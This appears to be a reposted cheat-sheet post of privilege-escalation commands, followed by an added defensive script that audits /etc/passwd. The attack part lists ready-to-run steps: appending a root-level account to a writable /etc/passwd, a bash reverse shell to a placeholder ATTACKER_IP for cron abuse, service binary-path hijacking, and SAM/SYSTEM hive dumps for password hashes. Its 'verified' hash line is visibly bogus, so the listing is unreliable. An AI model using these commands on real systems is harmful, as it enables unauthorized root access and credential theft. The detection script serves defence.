https://lnkd.in/gXr2CWwU
Practice Verified Codes and Commands:
1. Linux Privilege Escalation Commands:
- Check for SUID and SGID binaries:
find / -perm -u=s -o -perm -g=s 2>/dev/null
- Exploit writable /etc/passwd:
openssl passwd -1 -salt exploit password123
echo 'exploit:$1$exploit$d2hD5K4z8z9z8z9z8z9z8z:0:0:root:/root:/bin/bash' >> /etc/passwd
su exploit
- Exploit cron jobs:
echo "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" > exploit.sh
chmod +x exploit.sh
2. Windows Privilege Escalation Commands:
- Check for unquoted service paths:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
- Exploit weak service permissions:
sc config ServiceName binPath= "C:\Path\To\Malicious.exe"
sc start ServiceName
- Dump SAM database for password hashes:
reg save HKLM\SAM SAM.bak
reg save HKLM\SYSTEM SYSTEM.bak
What Undercode Say:
Local privilege escalation is a critical aspect of offensive security, allowing attackers to gain higher-level access on a system. This article delves into techniques and methodologies for escalating privileges on both Linux and Windows systems. On Linux, attackers often exploit SUID binaries, writable files, and cron jobs. Commands like `find`, `openssl`, and `chmod` are essential for identifying and exploiting these vulnerabilities. On Windows, unquoted service paths, weak service permissions, and SAM database extraction are common vectors. Tools like `wmic`, `sc`, and `reg` are invaluable for these tasks.
Understanding these techniques is crucial for both red teamers and defenders. Red teams can use these methods to simulate real-world attacks, while defenders can identify and patch vulnerabilities. Always ensure you have proper authorization before attempting these techniques in a live environment. For further reading, refer to the provided URL and explore additional resources on privilege escalation.
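A defender-side check for the writable /etc/passwd item in section 1, added here as an example (not code from the original post): the hypothetical `audit_passwd` function flags non-root UID 0 accounts, password hashes stored in the passwd file itself, and group- or world-writable permissions. It assumes a shadow-password system where field 2 is normally `x`, `*` or starts with `!`; the sample entries are constructed.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for the artefacts that the
# writable-/etc/passwd technique leaves behind.

# Constructed sample data (not from a real host). The last line mimics an
# appended UID 0 account carrying its own hash; the hash is a placeholder.
sample_passwd() {
cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
exploit:$1$exploit$CONSTRUCTEDPLACEHOLDERHASH:0:0:root:/root:/bin/bash
EOF
}

# audit_passwd FILE
# Prints one "kind:detail" finding per line; returns 0 if clean, 1 otherwise.
audit_passwd() {
    file=$1
    findings=$(
        awk -F: '
            /^[ \t]*(#|$)/ { next }                       # blank or comment
            NF != 7 { printf "malformed:line %d\n", NR; next }
            $3 == 0 && $1 != "root" { printf "uid0:%s\n", $1 }
            # Assumption: with shadow passwords, field 2 is x, * or !-prefixed.
            $2 != "x" && $2 != "*" && $2 !~ /^!/ {
                kind = ($2 == "") ? "emptypw" : "inlinehash"
                printf "%s:%s\n", kind, $1
            }
        ' "$file"
        # Group- or world-writable file: any local user could append entries.
        find "$file" -prune \( -perm -020 -o -perm -002 \) \
            -exec printf 'writable:%s\n' {} \;
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Stand-alone run: audit the constructed sample and show the findings.
tmp=$(mktemp)
sample_passwd > "$tmp"
audit_passwd "$tmp" || true
rm -f "$tmp"
```

On a real host, call `audit_passwd /etc/passwd` from a scheduled job and alert on a non-zero exit status.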
Related URLs:
- https://lnkd.in/gXr2CWwU
- https://attack.mitre.org/techniques/T1068/
- https://www.hackingarticles.in/linux-privilege-escalation/
- https://www.hackingarticles.in/windows-privilege-escalation/
References:
Hackers Feeds, Undercode AI